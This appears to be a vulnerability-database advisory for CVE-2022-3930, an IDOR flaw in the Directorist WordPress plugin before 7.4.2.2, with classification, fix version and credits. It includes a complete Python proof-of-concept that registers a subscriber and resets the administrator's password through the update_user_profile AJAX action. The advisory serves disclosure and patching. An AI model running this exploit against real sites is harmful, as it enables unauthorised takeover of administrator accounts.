WordPress Plugin Vulnerabilities

Directorist < 7.4.2.2 - Subscriber+ Arbitrary User Password Update via IDOR

Description

The plugin suffers from an IDOR vulnerability which an attacker can exploit to change the password of arbitrary users instead of his own.

Proof of Concept

The following Python script automates the exploitation of this vulnerability. The script was tested on an installation of WordPress 6.1 with the vulnerable plugin installed.

The PoC registers a new user account (randomly generated) and changes the admin user's password (user id 1) to a randomly generated password.



import re
import string
import random

import requests

BASE_URL = "http://127.0.0.1:7777"
REG_PAGE = BASE_URL + "/?page_id=14"
LOGIN_PAGE = BASE_URL + "/?page_id=15"
DASH_PAGE = BASE_URL + "/?page_id=13"

USERNAME = "".join(random.choices(string.ascii_lowercase, k=8))
PASSWORD = "".join(random.choices(string.ascii_letters, k=12))
NEW_ADMIN_PASS = "".join(random.choices(string.ascii_letters, k=16))


with requests.Session() as session:
    print(f"[+] Registering user account: {USERNAME}:{PASSWORD}")
    response = session.get(REG_PAGE)
    nonce = re.search('"directorist_nonce":"(.+?)"', response.text).group(1)
    repsonse = session.post(
        REG_PAGE,
        data={
            "username": USERNAME,
            "email": USERNAME + "@example.com",
            "password": PASSWORD,
            "privacy_policy": "on",
            "t_c_check": "on",
            "atbdp_user_submit": "",
            "directorist_nonce": nonce,
        },
    )

    print(f"[+] Authenticating as user: {USERNAME}")
    response = session.get(LOGIN_PAGE)
    nonce = re.search(r'<input type="hidden" id="security" name="security" value="(\w+)" />', response.text).group(1)
    response = session.post(
        f"{BASE_URL}/wp-admin/admin-ajax.php?action=ajaxlogin",
        data={
            "security": nonce,
            "username": USERNAME,
            "password": PASSWORD,
            "rememberme": "0",
        },
    )

    print(f"[+] Changing admin (uid=1) password to: {NEW_ADMIN_PASS}")
    response = session.get(DASH_PAGE)
    directorist_nonce = re.search('"directorist_nonce":"(.+?)"', response.text).group(1)
    response = session.post(
        f"{BASE_URL}/wp-admin/admin-ajax.php?action=update_user_profile",
        data={
            "directorist_nonce": directorist_nonce,
            "user[ID]": "1",
            "user[new_pass]": NEW_ADMIN_PASS,
            "user[confirm_pass]": NEW_ADMIN_PASS,
        },
    )

Affects Plugins

Plugin icon
directorist
Fixed in 7.4.2.2

References

CVE
CVE-2022-3930

Classification

Type
IDOR
OWASP top 10
A5: Broken Access Control
CWE
CWE-639
CVSS
7.1 (high)

Miscellaneous

Original Researcher
cydave
Submitter
cydave
Submitter website
https://cyllective.com/
Submitter twitter
cyllective
Verified
Yes
WPVDB ID
8728d02a-51db-4447-a843-0264b6ceb413

Timeline

Publicly Published
2022-11-16 (about 1 years ago)
Added
2022-11-21 (about 1 years ago)
Last Updated
2022-11-21 (about 1 years ago)

Other

Published
Title
Published
2023-02-27
Title
WooCommerce Multiple Customer Addresses & Shipping < 21.7 - Arbitrary Address Creation/Deletion/Access/Update via IDOR
Published
2024-04-22
Title
Rate My Post – Star Rating Plugin by FeedbackWP < 3.4.5 - Insecure Direct Object Reference
Published
2023-09-12
Title
wpDiscuz < 7.6.4 - Post Rating Increase/Decrease iva IDOR
Published
2021-07-27
Title
uListing < 2.0.6 - Authenticated IDOR
Published
2023-10-22
Title
wpDiscuz < 7.6.4 - Author+ IDOR